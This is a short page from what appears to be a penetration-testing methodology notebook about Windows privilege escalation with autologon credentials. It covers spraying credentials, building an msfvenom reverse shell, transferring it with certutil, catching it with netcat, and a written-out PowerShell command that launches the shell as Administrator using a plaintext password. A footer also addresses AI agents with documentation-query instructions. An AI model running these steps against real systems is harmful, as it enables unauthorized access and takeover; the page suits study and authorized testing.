> For the complete documentation index, see [llms.txt](https://lyethar.gitbook.io/methodology/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://lyethar.gitbook.io/methodology/readme/privilege-escalation/windows/passwords/autologon-credentials.md).

# Autologon Credentials

![](/files/GqUfSj2LgU4p8hRh6x2u)

These credentials can then be used based on the different users we have.&#x20;

We spray with either CME, or PSEXEC or runas or winrm, the users could be part of the remote management group which means we can use evil iwnrm

![](/files/C9S3k5O8Swe9w8biMjZt)

![](/files/MR6HCkiM3NvWs8gnaZuH)

![](/files/j1Y7frWKIAc8fnWbenrW)

Since there are no open services that would allow to remotely connect to the box as the Administrator user, such as RDP or WinRM, in order to exploit this, the PowerShell System.Management.Automation utility, which allows to execute scripts or binaries as a different user, can be leveraged. Clear-text credentials for the user can be provided when executing the command, which will be encrypted during execution.

Generating a reverse shell using MSFvenom with the following flags:

* -p to specify the payload type, in this case, the Windows TCP Reverse Shelll
* LHOST to specify the localhost IP address to connect to
* LPORT to specify the local port to connect to
* -f to specify the format for the shell, in this case, exe

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-104.png?w=800\&ssl=1)

Using the Certutil utility and the Python simple web server to transfer the reverse shell to the victim machine:

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-105.png?w=800\&ssl=1)

The next step is to set up a Netcat listener, which will catch the reverse shell when it is executed by the victim host, using the following flags:

* -l to listen for incoming connections
* -v for verbose output
* -n to skip the DNS lookup
* -p to specify the port to listen on

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-106.png?w=800\&ssl=1)

The following PowerShell command will execute the reverse shell as the Administrator user, if the credentials provided are correct:

```
powershell -c "$password = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force; $creds = New-Object System.Management.Automation.PSCredential('Administrator', $password);Start-Process -FilePath "shell.exe" -Credential $creds"
```

![](https://i0.wp.com/steflan-security.com/wp-content/uploads/2021/05/image-107.png?w=800\&ssl=1)


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://lyethar.gitbook.io/methodology/readme/privilege-escalation/windows/passwords/autologon-credentials.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
